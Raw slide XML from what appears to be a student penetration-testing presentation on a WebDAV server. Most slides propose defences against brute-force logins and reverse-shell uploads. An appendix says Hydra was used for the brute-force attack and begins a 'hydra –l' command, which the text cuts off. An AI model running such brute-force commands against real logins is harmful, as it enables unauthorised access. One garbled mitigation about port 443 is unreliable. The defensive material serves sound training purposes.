            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Encrypted file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Restrict sensitive data to specific users only unless giving a decryption key by the users in charge.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Don’t save password and hash on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> server as party of policy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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4" name="Google Shape;1224;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5" name="Google Shape;1225;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brute force attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="14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Set Alert if encounter a threshold of login     10 failures from a specific email address within 1 minute.</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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="14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Stronger password policy, Password make up at least 10 character long with upper case letter, lower case letter, numbers and special characters.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1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Google Shape;1226;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45720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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Increase password length.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Increase password complexity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Limit login attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Implement captcha.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Use multi-factor authentication.</a:t>
            </a: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a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{093C291D-DA8F-4F00-8F78-1B6412BCC7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5285283" y="3866780"/>
            <a:ext cx="2817267" cy="12766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2" name="Google Shape;1232;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3" name="Google Shape;1233;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access to this directory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"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Trigger alarm when files are being added to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"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 directory.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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>larm fires when unauthorized IP addresses are trying to add files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;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control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Administrators should install and config filebeat on the host so it limits logins to a specified IP address or range.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="14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Upload of file to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0" err="1">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webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="14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directory is not permitted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="14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Set read only.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;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1" name="Google Shape;1241;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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>- Store uploaded files in a location not accessible from the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>- Define valid types of files that the users should be allowed to upload. </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Perpetua" panose="02020502060401020303" pitchFamily="18" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>- Set alarm to use port 443 (SSL), so network content cannot be inspected easily since it is encrypted.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Perpetua" panose="02020502060401020303" pitchFamily="18" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>- One effective technique to prevent php files from being executed is to place all codes in a supplementary files inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400"/>
              <a:t>class definitions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>.</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sz="3400" b="1" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="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6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6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30886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Conclusion</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367350" y="840509"/>
            <a:ext cx="8409300" cy="3894667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
              <a:alpha val="14530"/>
            </a:schemeClr>
          </a:solid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AU" sz="1200" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In conclusion,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strategies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to mitigate authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilities are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> requiring two-factor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> web applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> protect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sensitive data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> such as financial information and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, attackers can easily carry out the attack . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> In particular, we started by discussing how this type of tools is currently applied to prevent OWASP Top 10 vulnerabilities in Web applications. We then analyzed OWASP IoT Top 10, and discussed how these vulnerabilities are related to OWASP Top 10 and what existing static analyses can be re-used to detect IoT vulnerabilities. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3569684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Appendix</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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6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6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96824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Code/Command used for : Finding the Hidden Directory</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311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Firefox brower was used, and was able to read the content of the sensitive file.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF45F7BE-8D63-48F8-A9F7-34A97C91D7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2482487" y="870564"/>
            <a:ext cx="4985114" cy="4004001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1168086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Code/Command used for : Uncovering the Brute Force Attack</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 name="Google Shape;1162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF779A3-D938-4AB8-AB11-233E3B6A29EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra was used to carried out the brute force attack.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1400" b="0" i="1"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7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F996CC-DED0-499F-A48C-AC947D793684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946566" y="804291"/>
            <a:ext cx="70173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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>hydra –l </a:t>
            </a:r>
            <a:r>
